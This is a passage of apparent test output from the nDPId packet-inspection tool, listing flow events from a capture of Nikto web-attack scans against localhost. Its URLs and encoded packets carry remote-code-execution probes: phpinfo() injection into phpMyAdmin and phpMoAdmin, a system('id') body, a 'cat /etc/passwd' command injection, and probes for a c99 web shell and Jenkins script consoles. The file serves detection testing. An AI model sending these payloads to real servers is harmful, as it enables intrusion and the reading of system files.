{"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277922,"pkt":"AAAAAAAAAAAAAAAACABFAADkm4xAAEAGoIV\/AAABfwAAAceOH5AOOaLD4MTa7oAYAED+2AAAAQEICp1m\/8qdZv\/KR0VUIC8zcmRwYXJ0eS9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277923,"pkt":"AAAAAAAAAAAAAAAACABFAADb3d5AAEAGXjx\/AAABfwAAAceQH5AJweSWVSMF84AYAED+zwAAAQEICp1m\/8udZv\/LR0VUIC9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1576420277925,"pkt":"AAAAAAAAAAAAAAAACABFAADU+B5AAEAGRAN\/AAABfwAAAceSH5DHT8FWYmCfAYAYAED+yAAAAQEICp1m\/82dZv\/NR0VUIC9wbWEvc2VydmVyX3N5bmMucGhwP2M9cGhwaW5mbygpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY2MDgpDQoNCg=="}
01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277926,"pkt":"AAAAAAAAAAAAAAAACABFAAC8cdVAAEAGymR\/AAABfwAAAceUH5AbWUib+wxcy4AYAED+sAAAAQEICp1m\/86dZv\/OR0VUIC9jOTkucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY3MzkpDQoNCg=="}
01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1576420277928,"pkt":"AAAAAAAAAAAAAAAACABFAAD73s9AAEAGXSt\/AAABfwAAAceWH5B+NOeIVrpz2oAYAED+7wAAAQEICp1m\/9CdZv\/PR0VUIC9hd2N1c2VyL2NnaS1iaW4vdmNzP3hzbD0vdmNzL3Zjc19ob21lLnhzbCUyNmNhdCUyMCUyMi9ldGMvcGFzc3dkJTIyJTI2IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01119{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420277929,"pkt":"AAAAAAAAAAAAAAAACABFAAC7MdtAAEAGCmB\/AAABfwAAAceYH5BhLQiUIFdU+oAYAED+rwAAAQEICp1m\/9GdZv\/RR0VUIC9zY3JpcHQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY5OTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277931,"pkt":"AAAAAAAAAAAAAAAACABFAADDfttAAEAGvVd\/AAABfwAAAceaH5AHCUeUa2pQhIAYAED+twAAAQEICp1m\/9OdZv\/SR0VUIC9qZW5raW5zL3NjcmlwdCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KDQo="}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277933,"pkt":"AAAAAAAAAAAAAAAACABFAADCrgRAAEAGji9\/AAABfwAAAcecH5DcgpdKIx+4uoAYAED+tgAAAQEICp1m\/9WdZv\/VR0VUIC9odWRzb24vc2NyaXB0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277971,"pkt":"AAAAAAAAAAAAAAAACABFAAFctdFAAEAGhch\/AAABfwAAAcfMH5DMiIyc+KcBsoAYAED\/UAAAAQEICp1m\/\/udZv\/7R0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="}
01119{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277972,"pkt":"AAAAAAAAAAAAAAAACABFAAFnwDVAAEAGe1l\/AAABfwAAAcfOH5AQvflnbGoufoAYAED\/WwAAAQEICp1m\/\/ydZv\/8R0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
